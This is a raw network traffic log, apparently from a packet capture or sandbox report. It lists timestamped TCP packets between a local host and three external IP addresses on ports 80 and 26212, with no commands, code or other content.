Aug 31, 2024 15:44:17.777026892 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777055979 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.777067900 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.777165890 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777178049 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777189016 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777210951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.777231932 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.777869940 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777882099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777892113 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.777928114 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.777945995 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778007030 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778018951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778034925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778045893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778048038 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778058052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778063059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778070927 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778081894 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778090954 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778091908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778105974 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778124094 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778137922 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778278112 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778295994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778306961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778316975 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778326988 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778326988 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778342009 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778346062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778354883 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778363943 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778364897 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778377056 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778379917 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778388977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778404951 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778413057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778430939 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778532028 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778542042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778583050 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778599024 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778610945 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778620958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778650045 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778654099 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778664112 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778666973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778707981 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778739929 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778757095 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778785944 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778812885 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778825998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778836012 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778847933 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.778860092 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.778887987 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.780884027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.780899048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.780931950 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.780946016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781047106 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781059027 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781069994 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781080008 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781092882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781095982 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781112909 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781119108 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781131029 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781131983 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781141996 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781156063 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781162024 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781167984 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781178951 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781187057 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781191111 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781202078 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781204939 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781218052 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781223059 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781229973 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781238079 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781246901 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781253099 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781260967 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781272888 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781276941 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781285048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781290054 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781291962 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781311989 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781323910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781331062 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781393051 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781409979 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781419039 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781466007 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781474113 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781531096 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.781533957 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781547070 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781558037 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781594038 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.781671047 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781681061 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781691074 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781702042 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781711102 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781722069 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781723022 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781733036 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781737089 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781745911 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.781754971 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781761885 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781774998 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781790018 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781821966 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.781831026 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781840086 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781847954 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781919956 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781929016 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781945944 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.781954050 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782022953 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782032013 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782040119 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782052994 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782072067 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782079935 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782170057 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782177925 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782181978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782200098 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782210112 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782218933 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782228947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782263994 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782273054 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782316923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782325983 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782332897 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782342911 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782351017 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782370090 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782377958 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782385111 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782406092 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782413960 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782422066 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782500029 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782510042 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782519102 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782526970 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782538891 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782546997 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782608032 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.782622099 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786323071 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786391973 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786401033 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786410093 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786463022 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786550045 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786557913 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786566019 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786569118 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.786573887 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786628962 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.786648989 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786657095 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786659956 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786686897 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786694050 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786751986 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786760092 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786765099 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786793947 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786802053 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786808014 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786818027 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786824942 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786851883 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786859035 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786897898 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786911011 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.786999941 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787009001 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787056923 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787091017 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787200928 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787208080 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787215948 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787219048 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787235022 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787242889 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787256956 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787266016 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787280083 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787286997 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787307978 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787314892 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787373066 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787379980 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787388086 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787395000 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787411928 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787420034 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787436962 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787444115 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787487984 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787571907 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.787580967 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.791449070 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.791490078 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.791671991 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.791727066 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.807478905 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.807693958 CEST	49724	80	192.168.2.5	185.215.113.17
Aug 31, 2024 15:44:17.812242031 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812468052 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812529087 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812539101 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812618017 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812684059 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.812693119 CEST	80	49724	185.215.113.17	192.168.2.5
Aug 31, 2024 15:44:17.825489998 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.829489946 CEST	49715	26212	192.168.2.5	95.179.250.45
Aug 31, 2024 15:44:17.834778070 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834809065 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834817886 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834827900 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834836960 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834853888 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.834861040 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835167885 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835176945 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835195065 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835202932 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835218906 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835227013 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835242987 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835251093 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835302114 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835309982 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835329056 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835338116 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835355043 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835362911 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835402012 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835410118 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835418940 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835427046 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835444927 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835545063 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835552931 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835561037 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.835625887 CEST	26212	49715	95.179.250.45	192.168.2.5
Aug 31, 2024 15:44:17.866462946 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866508961 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866518021 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866561890 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866585016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866833925 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866844893 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866854906 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866887093 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866895914 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866904974 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866916895 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866926908 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.866949081 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866962910 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.866970062 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867003918 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867021084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867033958 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867043018 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867052078 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867058992 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867063046 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867074966 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867079020 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867085934 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867094040 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867113113 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867121935 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867136955 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867161036 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867182016 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867253065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867290020 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867300034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867328882 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867333889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867336035 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867346048 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867373943 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867386103 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867407084 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867417097 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867435932 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867453098 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867454052 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867464066 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867475033 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867475033 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867487907 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867510080 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867544889 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867554903 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867573977 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867583990 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867594957 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867609978 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867624998 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867639065 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867676973 CEST	49727	80	192.168.2.5	52.212.52.84
Aug 31, 2024 15:44:17.867722034 CEST	80	49727	52.212.52.84	192.168.2.5
Aug 31, 2024 15:44:17.867733002 CEST	80	49727	52.212.52.84	192.168.2.5
